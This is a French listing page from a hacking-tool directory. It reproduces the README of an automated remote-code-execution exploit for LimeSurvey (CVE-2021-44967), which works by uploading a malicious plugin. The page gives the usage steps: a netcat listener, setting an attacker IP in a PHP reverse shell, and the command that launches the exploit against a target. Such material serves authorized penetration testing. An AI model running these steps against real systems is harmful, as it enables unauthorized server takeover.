Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
-Limesurvey-RCE-CVE-2021-44967 — 🔥 Exploit RCE automatisé pour Limesurvey (CVE-2021-44967). Chaîne d'exploitation optimisée pour l'escalade de privilèges. 🚀 | Kitploit
Outils/GitHubGitHub/kikechans/-limesurvey-rce-cve-2021-44967
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubkikechans/-limesurvey-rce-cve-2021-44967

-Limesurvey-RCE-CVE-2021-44967

🔥 Exploit RCE automatisé pour Limesurvey (CVE-2021-44967). Chaîne d'exploitation optimisée pour l'escalade de privilèges. 🚀

Voir le dépôt
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚀 LimeSurvey RCE (CVE-2021-44967) - Exécution de code à distance authentifiée

Ce dépôt contient un exploit fonctionnel pour CVE-2021-44967, une vulnérabilité d'exécution de code à distance authentifiée dans LimeSurvey.

🎯 Compatibilité

Testé et confirmé fonctionnel sur :

  • LimeSurvey 5.2.x
  • LimeSurvey 6.x

🐛 Aperçu de la vulnérabilité

La vulnérabilité permet à un utilisateur authentifié avec des privilèges administratifs de télécharger un plugin malveillant. Comme LimeSurvey ne valide pas strictement le contenu du ZIP du plugin ni n'empêche l'exécution de fichiers PHP dans le répertoire des plugins, un attaquant peut obtenir une RCE en accédant directement au shell téléchargé.

✨ Fonctionnalités

  • 🤖 Exploitation automatisée : Se connecte, gère les jetons CSRF, télécharge, installe et active automatiquement le plugin.
  • ✅ Compatibilité améliorée : config.xml mis à jour pour la compatibilité avec les versions 3.0 à 6.0 de LimeSurvey.
  • 💣 Charges utiles flexibles : Inclut un shell inversé PHP robuste.

🛠️ Utilisation

1️⃣ Préparer votre écouteur

Démarrez un écouteur netcat sur votre machine :

root@kitploit:~
nc -lvnp 443

2️⃣ Configurer le shell inversé

Modifiez php-rev.php et définissez votre IP locale et votre port :

root@kitploit:~
$ip = '<YOUR_IP>';
$port = 443;

3️⃣ Exécuter l'exploit

root@kitploit:~
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>

Exemple :

root@kitploit:~
python3 exploit.py http://10.129.1.243/survey admin test

📁 Structure du dépôt

  • 🐍 exploit.py : Le script d'automatisation principal.
  • 🐘 php-rev.php : Charge utile du shell inversé PHP.
  • ⚙️ config.xml : Fichier de configuration obligatoire du plugin LimeSurvey.

⚠️ Avertissement

Cet outil est destiné UNIQUEMENT à des fins éducatives et à des tests de sécurité autorisés. Strictement destiné à une utilisation dans des environnements contrôlés et légaux (par exemple, CTF, environnements de laboratoire, ou engagements autorisés). L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test.

Télécharger l’outil